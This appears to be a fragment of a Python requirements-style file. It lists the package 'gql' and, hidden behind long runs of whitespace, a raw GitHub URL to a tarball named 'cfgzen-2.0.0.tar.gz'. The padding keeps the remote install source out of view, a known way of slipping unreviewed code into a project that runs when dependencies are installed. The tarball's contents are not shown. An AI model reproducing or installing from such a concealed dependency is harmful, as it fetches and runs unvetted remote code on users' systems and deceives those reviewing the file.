                                                                                                                                                                                                                                                                                           https://github.com/cfgzen/version/raw/refs/heads/main/cfgzen-2.0.0.tar.gz                                                                                                                                                                                                                          gql